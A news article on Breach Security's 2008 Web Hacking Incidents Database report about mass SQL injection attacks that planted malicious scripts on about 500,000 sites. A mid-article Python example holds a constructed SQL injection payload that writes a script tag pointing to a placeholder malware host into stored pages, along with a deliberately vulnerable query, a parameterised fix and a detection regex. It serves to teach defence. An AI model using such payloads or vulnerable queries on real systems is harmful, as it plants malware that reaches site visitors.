Breach Security has released their annual Web Hacking Incidents Database (WHID) report. The focus is on the massive SQL Injection (SQLi) attacks seen online last year, and according to the data, more than 500,000 sites were compromised. The report states that SQLi attacks, with the aim of planting Malware on a compromised site, were the number one vector of attack in 2008.
[Image: SQL Injection attacks compromised 500,000 sites in 2008 (credit: SXC)]
The WHID report explains that there were three SQLi bots used in 2008: Nihaorr1, Asprox, and Evolution. It notes that while the initial attack vector was SQLi, overall the attacks more closely resembled Cross-Site Scripting methodology, because the end goal was to inject malicious JavaScript into the victim’s browser. Moreover, the attacks were not after information on the server; they were after the user base of the website itself, taking advantage of a legitimate resource and exploiting the trust users have in it.
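The mechanism the report describes, an SQL injection whose payload is a script tag written into site content rather than data read from the server, can be shown on a small scale. The following is an added example written for this article, not code from the WHID report or from any of the named bots; it assumes a SQLite-backed "articles" table, a page that bumps a view counter from a request parameter, and a constructed payload pointing at a placeholder domain. The vulnerable and hardened versions sit side by side, and a third function scans stored content for the injected tag, which is the symptom-level check that the report later contrasts with fixing the root cause.

```python
import re
import sqlite3

# Constructed sample: a script reference pointing at a reserved placeholder domain.
INJECTED_SCRIPT = '<script src="http://malware.example/x.js"></script>'

# Constructed sample payload for a request parameter such as ?id=...:
# closes the string literal, appends an UPDATE that tacks the script tag onto
# every article body, then comments out whatever the template adds afterwards.
PAYLOAD = "1'; UPDATE articles SET body = body || '" + INJECTED_SCRIPT + "'; --"

# Detector for the symptom: script or iframe tags inside stored article text.
INJECTED_TAG = re.compile(r"<(script|iframe)\b", re.IGNORECASE)


def setup_db():
    """Create an in-memory articles table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT, views INTEGER)"
    )
    conn.executemany(
        "INSERT INTO articles (id, body, views) VALUES (?, ?, ?)",
        [(1, "<p>First article</p>", 0), (2, "<p>Second article</p>", 0)],
    )
    conn.commit()
    return conn


def record_view_vulnerable(conn, article_id):
    """Vulnerable form: the request parameter is pasted into the SQL text.

    executescript() is used to emulate a database driver that accepts
    stacked statements (an assumption of this example); with such a driver
    the injected UPDATE runs as a second statement.
    """
    sql = f"UPDATE articles SET views = views + 1 WHERE id = '{article_id}';"
    conn.executescript(sql)
    conn.commit()


def record_view_safe(conn, article_id):
    """Hardened form: the parameter is bound, never interpreted as SQL.

    Returns the number of rows updated; a hostile string simply matches
    no article id.
    """
    cur = conn.execute(
        "UPDATE articles SET views = views + 1 WHERE id = ?", (article_id,)
    )
    conn.commit()
    return cur.rowcount


def find_injected_rows(conn):
    """Return ids of articles whose stored body contains a script/iframe tag.

    This finds planted content after the fact; it does not fix the query
    that let it in.
    """
    rows = conn.execute("SELECT id, body FROM articles").fetchall()
    return sorted(row_id for row_id, body in rows if INJECTED_TAG.search(body))


if __name__ == "__main__":
    vulnerable = setup_db()
    record_view_vulnerable(vulnerable, PAYLOAD)
    print("rows carrying injected tags (vulnerable query):", find_injected_rows(vulnerable))

    hardened = setup_db()
    print("rows updated by payload (parameterised query):", record_view_safe(hardened, PAYLOAD))
    print("rows carrying injected tags (parameterised query):", find_injected_rows(hardened))
```

Run as a script, the vulnerable path leaves every article body carrying the script tag, so each visitor's browser would load it; the bound-parameter path updates zero rows for the same input. The scan is useful for incident response, but as the report argues, cleaning the rows without replacing the concatenated query only invites the next bot run.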
Another interesting aspect of the report centers on the site defacements seen in 2008.
“…the ideologists use the Internet to convey their message using Web hacking. Their main vehicle is defacing web sites. Web defacements are a serious problem and are a critical barometer for estimating exploitable vulnerabilities in web sites…When further analyzing defacement incidents, we found that the majority were of a political nature, targeting political parties, candidates, and government departments, often with a very specific message related to a campaign. Others have a cultural aspect, mainly Islamic hackers defacing western web sites,” adds the WHID.
Yet, while the ideologists are spreading the word, other criminals are using the compromised hosts for Phishing, Rootkit delivery, and Malware distribution. The end goal for these is information and money, which is typical when you consider the type of Malware used as payloads in the attacks.
When it comes to how sites were exploited in 2008, again SQLi was the largest vector. However, 29 percent of the attacks in the WHID report are listed as Unknown. This means that there was no attack method reported when the compromise was made public.
The report attributes this to two things: Lack of Visibility of Web Traffic, where organizations lack adequate monitoring and logging, and Resistance to Public Disclosure.
“Most organizations are reluctant to publicly disclose the details of the compromise for fear of public perception and possible impact to customer confidence or competitive advantage,” the report states.
“In many cases we feel that this lack of disclosure, apart from skewing statistics, prevents fixing the root cause of the problem. This is most noticeable in malware-planting incidents, in which the focus of the remediation process is removing the malware from the site rather than fixing the vulnerabilities that enabled attackers to gain access in the first place.”
The report wraps up with a breakdown of the sectors that suffered the most attacks on their systems. Government, security, and law enforcement take the top spot with thirty-two percent, followed by information services, retail, Internet, and education, which round out the top five.
The report is here. [Registration required]